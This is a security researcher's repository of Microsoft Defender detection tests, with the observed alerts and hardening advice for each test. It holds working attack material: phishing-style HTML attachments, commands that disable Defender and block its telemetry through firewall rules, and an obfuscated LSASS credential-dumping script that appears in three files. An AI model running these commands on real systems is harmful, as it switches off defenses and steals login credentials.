├── DEV
    ├── DEV01-MDO-FileDetonation
    │   ├── DEV01-Attachment-Type1.html
    │   ├── DEV01-Attachment-Type2.html
    │   ├── DEV01-Attachment-Type3.html
    │   ├── README.md
    │   ├── dev01-img-error.jpg
    │   └── dev01-img-sea.jpg
    ├── DEV02-AVtampering
    │   └── Dev02-AVTampering.md
    ├── DEV03-FirewallTampering
    │   └── Dev03-FirewallTampering.md
    ├── DEV04-LSASSdumping-MiniDump
    │   ├── Dev04-LSASSdumping-MiniDump.md
    │   └── Dev04Ninja.ps1
    └── Repo
    │   ├── Ninja_IOC_db.csv
    │   ├── Payload1.ps1
    │   └── common_password.txt
└── README.md


/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type1.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 |   <!-- yyyy/mm/dd - 2:06pm - name -->
 4 | <head>
 5 |   <meta charset="UTF-8">
 6 |   <meta name="viewport" content="width=device-width, initial-scale=1.0">
 7 |   <title>Login Form</title>
 8 |   <style>
 9 |     body {
10 |       font-family: Arial, sans-serif;
11 |       display: flex;
12 |       align-items: center;
13 |       justify-content: center;
14 |       height: 100vh;
15 |       margin: 0;
16 |       background-image: url('https://raw.githubusercontent.com/LearningKijo/ResearchDev/main/DEV/DEV01-MDO-FileDetonation/dev01-img-sea.jpg');
17 |       background-size: cover;
18 |       background-position: center;
19 |     }
20 |     #loginContainer {
21 |       text-align: left;
22 |       padding: 20px;
23 |       background-color: white;
24 |       border-radius: 5px;
25 |       box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
26 |     }
27 |     #waitingSection {
28 |       margin-top: 20px;
29 |       padding: 10px;
30 |       background-color: #ffc107;
31 |       color: #856404;
32 |       border: 1px solid #ffa800;
33 |       border-radius: 5px;
34 |     }
35 |   </style>
36 | </head>
37 | <body>
38 | 
39 |   <div id="loginContainer">
40 |     <h2>Sign in</h2>
41 |     <form>
42 |       <label for="username">Username:</label>
43 |       <input type="text" id="username" name="username" required>
44 | 
45 |       <label for="password">Password:</label>
46 |       <input type="password" id="password" name="password" required>
47 | 
48 |       <button type="button" onclick="simulateLogin()">Login</button>
49 |     </form>
50 | 
51 |     <div id="waitingSection">
52 |       <p>There was a problem with the login. Redirecting...</p>
53 |     </div>
54 |   </div>
55 | 
56 |   <script>
57 |     // Show the waiting section
58 |     document.getElementById("waitingSection").style.display = "block";
59 | 
60 |     // Redirect after 5 seconds
61 |     setTimeout(function () {
62 |       window.location.href = "https://www.eicar.org/download/eicar_com-zip/?wpdmdl=8847&refresh=657b07a8684281702561704"; // Replace with your desired URL
63 |     }, 5000); // 5000 milliseconds = 5 seconds
64 | 
65 |     // Simulate a login (optional)
66 |     function simulateLogin() {
67 |       // You can add login logic here if needed
68 |     }
69 |   </script>
70 | 
71 | </body>
72 | </html>
73 | 


--------------------------------------------------------------------------------
/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type2.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta charset="UTF-8">
 5 |     <meta http-equiv="refresh" content="7;url=https://www.eicar.org/download/eicar_com-zip/?wpdmdl=8847&refresh=657b07a8684281702561704">
 6 |     <title>Download Page</title>
 7 |     <style>
 8 |         body {
 9 |             text-align: center;
10 |             padding: 50px;
11 |             font-family: Arial, sans-serif;
12 |             margin: 0;
13 |         }
14 | 
15 |         #loading-bar-container {
16 |             width: 200px; /* Adjust the width of the progress bar container */
17 |             height: 20px; /* Adjust the height of the progress bar container */
18 |             border: 1px solid #ccc;
19 |             margin: 20px auto;
20 |         }
21 | 
22 |         #loading-bar {
23 |             height: 100%;
24 |             width: 0;
25 |             background-color: #4CAF50; /* Adjust the color of the progress bar */
26 |         }
27 | 
28 |         #footer {
29 |             position: fixed;
30 |             bottom: 0;
31 |             left: 0; /* Align the left side to the edge of the viewport */
32 |             width: 100vw; /* Full width of the viewport */
33 |             background-color: #333; /* Adjust the color of the background */
34 |             padding: 10px;
35 |             text-align: center; /* Center the text */
36 |             font-size: 14px;
37 |             color: #fff; /* Adjust the text color */
38 |         }
39 |     </style>
40 | </head>
41 | <body>
42 |     <h1>Downloading...</h1>
43 |     
44 |     <div id="loading-bar-container">
45 |         <div id="loading-bar"></div>
46 |     </div>
47 | 
48 |     <p>If the download doesn't start, <a href="https://www.eicar.org/download/eicar_com-zip/?wpdmdl=8847&refresh=657b07a8684281702561704">click here</a>.</p>
49 | 
50 |     <div id="footer">
51 |         <p>Fake Company Name &copy; 2023</p>
52 |     </div>
53 | 
54 |     <script>
55 |         // Simulate a progress bar fill over 7 seconds
56 |         let progressBar = document.getElementById("loading-bar");
57 |         let width = 0;
58 |         let duration = 7 * 1000; // 7 seconds in milliseconds
59 |         let interval = setInterval(frame, duration / 100);
60 | 
61 |         function frame() {
62 |             if (width >= 100) {
63 |                 clearInterval(interval);
64 |             } else {
65 |                 width++;
66 |                 progressBar.style.width = width + "%";
67 |             }
68 |         }
69 |     </script>
70 | </body>
71 | </html>
72 | 


--------------------------------------------------------------------------------
/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type3.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta charset="UTF-8">
 5 |     <meta name="viewport" content="width=device-width, initial-scale=1.0">
 6 |     <title>Multiple Delayed Error Messages with Redirect</title>
 7 |     <style>
 8 |         body {
 9 |             font-family: Arial, sans-serif;
10 |             text-align: center;
11 |             padding: 50px;
12 |             background-image: url('https://raw.githubusercontent.com/LearningKijo/ResearchDev/main/DEV/DEV01-MDO-FileDetonation/dev01-img-error.jpg');
13 |             background-size: cover;
14 |             background-position: center;
15 |             color: #fff; /* Set text color to white for better visibility */
16 |         }
17 | 
18 |         #download-link {
19 |             display: inline-block;
20 |             padding: 10px 20px;
21 |             font-size: 16px;
22 |             text-decoration: none;
23 |             background-color: #4CAF50;
24 |             color: #fff;
25 |             border-radius: 5px;
26 |         }
27 | 
28 |         .error-message {
29 |             color: #ff0000;
30 |             margin-top: 10px;
31 |             display: none;
32 |         }
33 |     </style>
34 | </head>
35 | <body>
36 |     <h1>Multiple Delayed Error Messages with Redirect</h1>
37 | 
38 |     <a id="download-link" href="#" onclick="downloadFile()">Download Text File</a>
39 | 
40 |     <!-- Error messages will be appended here -->
41 |     <div id="error-container"></div>
42 | 
43 |     <script>
44 |         // Counter to keep track of displayed error messages
45 |         var errorCounter = 0;
46 | 
47 |         // Simulate delayed error messages multiple times
48 |         function displayErrorMessage() {
49 |             // Create a new error message element
50 |             var errorMessage = document.createElement('p');
51 |             errorMessage.className = 'error-message';
52 |             errorMessage.textContent = 'An error occurred. Please try again later. Code Error = [ASERFG0831000X] Support Call +423-9900-0000 Emergency !!!!';
53 | 
54 |             // Append the error message to the container
55 |             document.getElementById('error-container').appendChild(errorMessage);
56 | 
57 |             // Display the error message
58 |             errorMessage.style.display = 'block';
59 | 
60 |             // Increment the error counter
61 |             errorCounter++;
62 | 
63 |             // Redirect after 20 messages
64 |             if (errorCounter === 30) {
65 |                 setTimeout(function() {
66 |                     window.location.href = 'https://www.eicar.org/download/eicar_com-zip/?wpdmdl=8847&refresh=657b07a8684281702561704'; // Replace with your desired URL
67 |                 }, 3000);
68 |             }
69 |         }
70 | 
71 |         // Simulate delayed error messages multiple times
72 |         for (let i = 0; i < 30; i++) {
73 |             setTimeout(displayErrorMessage, 200 * i);
74 |         }
75 | 
76 |         function downloadFile() {
77 |             // Create a Blob with the file content
78 |             var fileContent = 'Hello, this is a sample text file!';
79 |             var blob = new Blob([fileContent], { type: 'text/plain' });
80 | 
81 |             // Create a temporary link and trigger a click to download the file
82 |             var link = document.createElement('a');
83 |             link.href = window.URL.createObjectURL(blob);
84 |             link.download = 'sample.txt';
85 |             document.body.appendChild(link);
86 |             link.click();
87 | 
88 |             // Clean up the temporary link
89 |             document.body.removeChild(link);
90 |         }
91 |     </script>
92 | </body>
93 | </html>
94 | 


--------------------------------------------------------------------------------
/DEV/DEV01-MDO-FileDetonation/README.md:
--------------------------------------------------------------------------------
 1 | # MDO Safe Attachments : File Detonation Validation
 2 | This is a test file designed for ***"File Detonation"*** and ***"Deep Analysis"*** of safe attachments in Microsoft Defender for Office 365.
 3 | 
 4 | > [!Important]
 5 | > For the purpose of testing, the ecair, a testing file URL has been utilized in the HTML file redirection. You have the flexibility to modify the lines and use an alternative link. However, it is strongly recommended to perform testing exclusively within a controlled environment for validation purposes.
 6 | 
 7 | ### Usage 
 8 | 1. Donwload one of the test html files.
 9 |    - [x] [DEV01-Attachment-Type1.html](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type1.html)
10 |    - [x] [DEV01-Attachment-Type2.html](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type2.html)
11 |    - [x] [DEV01-Attachment-Type3.html](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type3.html)
12 |  
13 | 2. Send an email with ***the html file*** to the test user.
14 | 
15 | ### How HTML file works
16 | e.g. DEV01-Attachment-Type1.html
17 | ![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/d4a08f23-193d-4073-a06d-47dcb194468f)
18 | 
19 | ### HTML file templates
20 | ![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/aeb12d13-b91e-476b-b168-dcd30f8ae6d5)
21 | 
22 | #### Disclaimer
23 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
24 | 


--------------------------------------------------------------------------------
/DEV/DEV01-MDO-FileDetonation/dev01-img-error.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LearningKijo/ResearchDev/d6f84e82ca19656c6270345f0d34b4619611584a/DEV/DEV01-MDO-FileDetonation/dev01-img-error.jpg


--------------------------------------------------------------------------------
/DEV/DEV01-MDO-FileDetonation/dev01-img-sea.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LearningKijo/ResearchDev/d6f84e82ca19656c6270345f0d34b4619611584a/DEV/DEV01-MDO-FileDetonation/dev01-img-sea.jpg


--------------------------------------------------------------------------------
/DEV/DEV02-AVtampering/Dev02-AVTampering.md:
--------------------------------------------------------------------------------
  1 | # AV Tampering 
  2 | Microsoft Defender for Endpoint does provide AV tampering protection called **Tamper Protection**, preventing attackers from modifying values and disabling detection engines during defense evasion attempts. If Tamper Protection is enabled, AV tampering activities will be blocked. Even if not enabled, AV tampering activities will be detected by Microsoft Defender for Endpoint.
  3 | 
  4 | On this page, I would like to showcase **some test methods** and demonstrate **the detection/alerts** capabilities of Microsoft Defender for Endpoint. 
  5 | 
  6 | ## Red Note (test insights)
  7 | **PowerShell, Defender Cmdlet** 
  8 | ```powershell
  9 | # Disable real-time protection
 10 | Set-MpPreference -DisableRealtimeMonitoring $true
 11 | # Disable cloud-delivered protection
 12 | Set-MpPreference -MAPSReporting 0
 13 | # Modify exclusions - Extensions & Paths 
 14 | Set-MpPreference -ExclusionExtension "ps1" -ExclusionPath "C:\"
 15 | ```
 16 | 
 17 | **PowerShell, creating new registry values**
 18 | ```powershell
 19 | # Disable real-time protection
 20 | New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWord -Force
 21 | # Disable cloud-delivered protection
 22 | New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name SpynetReporting -Value 0 -PropertyType DWord -Force
 23 | # Modify exclusions - Extensions & Paths 
 24 | New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" -Name "ps1" -Value 0 -PropertyType String -Force
 25 | New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -Name "C:\" -Value 0 -PropertyType String -Force
 26 | ```
 27 | > [!Important]
 28 | > If the specified path doesn't exist, PowerShell returns an error. So, please ensure that the path exists. If it doesn't exist, you can create it.
 29 | > e.g. if Exclusions/Extensions path doesn't exist
 30 | > ```powershell
 31 | > New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" -Name 'Extensions' -Force -ErrorAction 0
 32 | > ```
 33 | 
 34 | **PowerShell, stop Defender Service & Process**
 35 | ```powershell
 36 | Stop-Service -Name "WinDefend"
 37 | Stop-Process -Name "MsMpEng"
 38 | ```
 39 | 
 40 | **Windows commands, creating new registry values**
 41 | ```cmd
 42 | rem Disable real-time protection
 43 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
 44 | rem Disable cloud-delivered protection
 45 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
 46 | rem Modify exclusions - Extensions & Paths 
 47 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "ps1" /t REG_SZ /d 0 /f
 48 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\" /t REG_DWORD /d 0 /reg:64
 49 | ```
 50 | 
 51 | **Windows commands, stop Defender Service, Network Service**
 52 | ```cmd
 53 | sc stop WinDefend
 54 | net stop WinDefend
 55 | ```
 56 | 
 57 | ## Alerts & Detections
 58 | Here are alerts detected by Microsoft Defender for Endpoint and Microsoft Defender Antivirus. 
 59 | These alerts originated from the aforementioned PowerShell and CMD.
 60 | 
 61 | - [x] Suspicious Microsoft Defender Antivirus exclusion
 62 | - [x] Attempt to turn off Microsoft Defender Antivirus protection
 63 | - [x] An active 'MpTamperSrvDisableAV' malware was prevented from executing via AMSI
 64 | - [x] An active 'MpTamperSrvDisableAV' malware in a command line was prevented from executing
 65 | - [x] Microsoft Defender Antivirus protection turned off
 66 | - [x] Microsoft Defender Antivirus tampering
 67 | 
 68 | ![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/4cc90ed3-6672-421b-84c0-4b8fb6e6b4f6)
 69 | 
 70 | **Detecting potential tampering activity in the Microsoft Defender portal**
 71 | 
 72 | When tampering is detected, an alert is raised. Some of the alert titles for tampering are : [Tamper resiliency](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/tamper-resiliency?view=o365-worldwide)
 73 | ```
 74 | - Attempt to bypass Microsoft Defender for Endpoint client protection
 75 | - Attempt to stop Microsoft Defender for Endpoint sensor
 76 | - Attempt to tamper with Microsoft Defender on multiple devices
 77 | - Attempt to turn off Microsoft Defender Antivirus protection
 78 | - Defender detection bypass
 79 | - Driver-based tampering attempt blocked
 80 | - Image file execution options set for tampering purposes
 81 | - Microsoft Defender Antivirus protection turned off
 82 | - Microsoft Defender Antivirus tampering
 83 | - Modification attempt in Microsoft Defender Antivirus exclusion list
 84 | - Pending file operations mechanism abused for tampering purposes
 85 | - Possible Antimalware Scan Interface (AMSI) tampering
 86 | - Possible remote tampering
 87 | - Possible sensor tampering in memory
 88 | - Potential attempt to tamper with MDE via drivers
 89 | - Security software tampering
 90 | - Suspicious Microsoft Defender Antivirus exclusion
 91 | - Tamper protection bypass
 92 | - Tampering activity typical to ransomware attacks
 93 | - Tampering with Microsoft Defender for Endpoint sensor communication
 94 | - Tampering with Microsoft Defender for Endpoint sensor settings
 95 | - Tampering with the Microsoft Defender for Endpoint sensor
 96 | ```
 97 | 
 98 | ## Blue Note
 99 | - Turn on [Microsoft Defender Antvirus](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/next-generation-protection?view=o365-worldwide) (Including Real-Time Protection, Cloud Protection, Sample Submission and so on)
100 | - Onboarding [Microsoft Defender for Endpoint](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide)
101 | - Turn on Microsoft Defender for Endpoint, [Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide&ocid=magicti_ta_learndoc)
102 | 
103 | ## Reference
104 | - [Current limits of Defender AV Tamper Protection](https://cloudbrothers.info/current-limits-defender-av-tamper-protection/)
105 | - [Make sure Tamper Protection is turned on](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/make-sure-tamper-protection-is-turned-on/ba-p/2695568)
106 | - [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](https://www.microsoft.com/en-us/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/)
107 | - [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](https://www.microsoft.com/en-us/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/)
108 | 
109 | 
110 | #### Disclaimer
111 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
112 | 


--------------------------------------------------------------------------------
/DEV/DEV03-FirewallTampering/Dev03-FirewallTampering.md:
--------------------------------------------------------------------------------
 1 | # Firewall Tampering, Blocking EDR/AV communication
 2 | Microsoft Defender Antivirus detects and **prevents tampering** with the creation of firewall rules for both Microsoft Defender for Endpoint and Microsoft Defender Antivirus.
 3 | 
 4 | ## Red Note (test insights)
 5 | **[Bypassing Defender EDR using Windows Firewall - mitigations](https://write-verbose.com/2022/05/31/EDRBypass/)**
 6 | ```Powershell
 7 | New-NetFirewallRule -DisplayName "Block 443 MsMpEng" -Name "Block 443 MsMpEng" -Direction Outbound -Service WinDefend -Enabled True -RemotePort 443 -Protocol TCP -Action Block
 8 | New-NetFirewallRule -DisplayName "Block 443 SenseCncProxy" -Name "Block 443 SenseCncProxy" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" -RemotePort 443 -Protocol TCP -Action Block
 9 | New-NetFirewallRule -DisplayName "Block 443 MsSense" -Name "Block 443 MsSense" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" -RemotePort 443 -Protocol TCP -Action Block
10 | ```
11 | 
12 | 
13 | ## Alerts & Detections
14 | After testing, Microsoft Defender Antivirus detected these alerts.
15 | 
16 | - [x] An active 'MpTamperBlockNewFirewall' malware was prevented from executing via AMSI
17 | - [x] An active 'DefenderFirewallTamper' malware in a command line was prevented from executing
18 | - [x] Suspicious 'WDBlockFirewallRule' behavior was blocked
19 | 
20 | ![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/7d86f078-852b-482b-bd4d-51c4b79c467d)
21 | 
22 | ![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/1dd25ae9-0f60-4391-93a1-a5b3b1bc3118)
23 | 
24 | ## Blue Note
25 | Since firewall tampering activities are detected and prevented by the antivirus, please ensure that these configurations are properly implemented.
26 | - Turn on [Microsoft Defender Antvirus](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/next-generation-protection?view=o365-worldwide) (Including Real-Time Protection, Cloud Protection, Sample Submission and so on)
27 | - Onboarding [Microsoft Defender for Endpoint](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide)
28 | - Turn on Microsoft Defender for Endpoint, [Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide&ocid=magicti_ta_learndoc)
29 | 
30 | #### Disclaimer
31 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
32 | 


--------------------------------------------------------------------------------
/DEV/DEV04-LSASSdumping-MiniDump/Dev04-LSASSdumping-MiniDump.md:
--------------------------------------------------------------------------------
 1 | # LSASS dumping, MiniDump
 2 | Hackers might target LSASS to grab login credentials stored in its memory. 
 3 | After a user logs in, LSASS stores important credential info that can be stolen by attackers to move through a system using different authentication details.
 4 | 
 5 | Microsoft Defender for Endpoint and Defender Antivirus effectively prevent and detect LSASS dumping activities. 
 6 | Now, I'd like to demonstrate the detection perspective by ***capturing all activities and correlating multiple alerts into a single incident***.
 7 | 
 8 | ## Red Note (test insights)
 9 | **PowerShell, LSASS credential dumping, Built-in Windows tool** 
10 | ```powershell
11 | $lsassPID = (Get-Process -Name lsass).Id
12 | cmd.exe /C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPID C:\temp\out.dmp full" 
13 | ```
14 | 
15 | **Attack Script**
16 | - [x] Download [a script](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV04-LSASSdumping-MiniDump/Dev04Ninja.ps1) ↓
17 | 
18 | ```powershell
19 | # Disable Microsoft Defender Antivrus tool
20 | Set-MpPreference -DisableRealtimeMonitoring $true -ExclusionPath "C:\" -DisableBlockAtFirstSeen $true -DisableEmailScanning $true -DisableScriptScanning $true -ExclusionExtension "exe"
21 | 
22 | # Create "C:\temp" for a dump file
23 | $tempDir = "C:\temp"
24 | if (-not (Test-Path $tempDir -PathType Container)) {
25 |         New-Item -Path $tempDir -ItemType Directory
26 | }
27 | 
28 | # Wait for 10 seconds
29 | Start-Sleep -Seconds 10
30 | 
31 | # LSASS dumping using the built-in Windows tool, Encoded by Base64
32 | powershell.exe -e JABsAHMAYQBzAHMAUABJAEQAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABsAHMAYQBzAHMAKQAuAEkAZAANAAoAYwBtAGQALgBlAHgAZQAgAC8AQwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbwBtAHMAdgBjAHMALgBkAGwAbAAsACAATQBpAG4AaQBEAHUAbQBwACAAJABsAHMAYQBzAHMAUABJAEQAIABDADoAXAB0AGUAbQBwAFwAbwB1AHQALgBkAG0AcAAgAGYAdQBsAGwAIgA=
33 | ```
34 | > [!Note]
35 | > This script will perform the following actions:
36 | > 1. Disable Microsoft Defender Antivrus tool
37 | > 2. Create "C:\temp" for a dump file
38 | > 3. LSASS dumping using the built-in Windows tool (Encoded by Base64)
39 | > 
40 | > Make sure that [MDE Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide&ocid=magicti_ta_learndoc) is disabled.
41 | 
42 | ## Alerts & Detections
43 | After running the script, these alerts were generated and correlated into a single incident in Microsoft Defender XDR portal.
44 | - [x] Suspicious PowerShell command line
45 | - [x] Sensitive credential memory read
46 | - [x] Suspicious process executed PowerShell command
47 | - [x] Suspicious access to LSASS service
48 | - [x] Process memory dump
49 | - [x] Suspicious Process Discovery
50 | - [x] Suspicious Microsoft Defender Antivirus exclusion
51 | - [x] Attempt to turn off Microsoft Defender Antivirus protection
52 | 
53 | ![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/b7f1dc16-ac2a-4032-9f77-fd1cd1074318)
54 | 
55 | ![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/98f5cf84-59e7-46ee-a9ad-58434efedd83)
56 | 
57 | ## Blue Note
58 | - Turn on [Microsoft Defender Antvirus](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/next-generation-protection?view=o365-worldwide) (Including Real-Time Protection, Cloud Protection, Sample Submission and so on)
59 | - Enable ASR rules, [
60 | Block credential stealing from the Windows local security authority subsystem](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem)
61 | - Onboarding [Microsoft Defender for Endpoint](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide)
62 | - Turn on Microsoft Defender for Endpoint, [Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide&ocid=magicti_ta_learndoc)
63 | 
64 | Windows administrators can also perform the following to further harden the LSASS process on their devices:
65 | - Enable [PPL for LSASS process](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#BKMK_HowToConfigure); note that for new, enterprise-joined Windows 11 installs (22H2 update), this is already enabled by default
66 | - Enable [Windows Defender Credential Guard](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure?tabs=intune#enable-windows-defender-credential-guard); this is also now enabled by default for organizations using the Enterprise edition of Windows 11
67 | - Enable [restricted admin mode](https://learn.microsoft.com/en-us/archive/blogs/kfalde/restricted-admin-mode-for-rdp-in-windows-7-2008-r2) for Remote Desktop Protocol (RDP)
68 | - Disable [“UseLogonCredential” in WDigest](https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649)
69 | 
70 | ## Reference
71 | - [OS Credential Dumping: LSASS Memory, T1003.001](https://attack.mitre.org/techniques/T1003/001/)
72 | - [Detecting and preventing LSASS credential dumping attacks](https://www.microsoft.com/en-us/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/)
73 | 
74 | #### Disclaimer
75 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
76 | 


--------------------------------------------------------------------------------
/DEV/DEV04-LSASSdumping-MiniDump/Dev04Ninja.ps1:
--------------------------------------------------------------------------------
 1 | Set-MpPreference -DisableRealtimeMonitoring $true -ExclusionPath "C:\" -DisableBlockAtFirstSeen $true -DisableEmailScanning $true -DisableScriptScanning $true -ExclusionExtension "exe"
 2 |     
 3 | $tempDir = "C:\temp"
 4 | 
 5 | if (-not (Test-Path $tempDir -PathType Container)) {
 6 |         New-Item -Path $tempDir -ItemType Directory
 7 | }
 8 | 
 9 | Start-Sleep -Seconds 10
10 |     
11 | powershell.exe -e JABsAHMAYQBzAHMAUABJAEQAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABsAHMAYQBzAHMAKQAuAEkAZAANAAoAYwBtAGQALgBlAHgAZQAgAC8AQwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbwBtAHMAdgBjAHMALgBkAGwAbAAsACAATQBpAG4AaQBEAHUAbQBwACAAJABsAHMAYQBzAHMAUABJAEQAIABDADoAXAB0AGUAbQBwAFwAbwB1AHQALgBkAG0AcAAgAGYAdQBsAGwAIgA=
12 | 


--------------------------------------------------------------------------------
/DEV/Repo/Ninja_IOC_db.csv:
--------------------------------------------------------------------------------
 1 | Type,Artifact,First Seen,Last Seen,Source
 2 | hash_md5,KIJO5F10F7F27F98BE30959D9711,6/3/2024 12:00,6/3/2024 12:34,Defender TI
 3 | hash_sha1,KIJOFC60899C6D0468ADE1ABD8E66BDF2ED4,5/18/2021 11:50,8/23/2023 11:29,Defender TI
 4 | hash_sha1,KIJOFC781887FD0579044BBF783E6C408EB0EE,5/19/2021 15:38,8/23/2023 12:02,Defender TI
 5 | hash_sha256,KIJOFFE5BD1B210588268208AD89C3D5FCF9DE0E9,10/23/2024 13:06,12/26/2024 2:15,Defender TI
 6 | hash_sha256,KIJOFFF47788BBE2A6F84C5211EAD0FB0E76E2F7D9C312A,10/23/2024 13:06,12/23/2024 1:50,Defender TI
 7 | domain,ninja-gov.cloud,10/23/2024 14:02,10/28/2024 22:08,Defender TI
 8 | domain,ninja-trust.solutions,10/23/2024 11:17,1/19/2025 7:23,Defender TI
 9 | domain,xinzhantong,10/23/2024 11:17,1/19/2025 7:23,TechConnect
10 | 


--------------------------------------------------------------------------------
/DEV/Repo/Payload1.ps1:
--------------------------------------------------------------------------------
 1 | # Set-MpPreference -DisableRealtimeMonitoring $true -ExclusionPath "C:\" -DisableBlockAtFirstSeen $true -DisableEmailScanning $true -DisableScriptScanning $true -ExclusionExtension "exe"
 2 |     
 3 | $tempDir = "C:\temp"
 4 | 
 5 | if (-not (Test-Path $tempDir -PathType Container)) {
 6 |         New-Item -Path $tempDir -ItemType Directory
 7 | }
 8 | 
 9 | Start-Sleep -Seconds 10
10 |     
11 | powershell.exe -e JABsAHMAYQBzAHMAUABJAEQAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABsAHMAYQBzAHMAKQAuAEkAZAANAAoAYwBtAGQALgBlAHgAZQAgAC8AQwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbwBtAHMAdgBjAHMALgBkAGwAbAAsACAATQBpAG4AaQBEAHUAbQBwACAAJABsAHMAYQBzAHMAUABJAEQAIABDADoAXAB0AGUAbQBwAFwAbwB1AHQALgBkAG0AcAAgAGYAdQBsAGwAIgA=
12 | 


--------------------------------------------------------------------------------
/DEV/Repo/common_password.txt:
--------------------------------------------------------------------------------
  1 | 123456
  2 | password
  3 | 12345
  4 | 123456789
  5 | qwerty
  6 | abc123
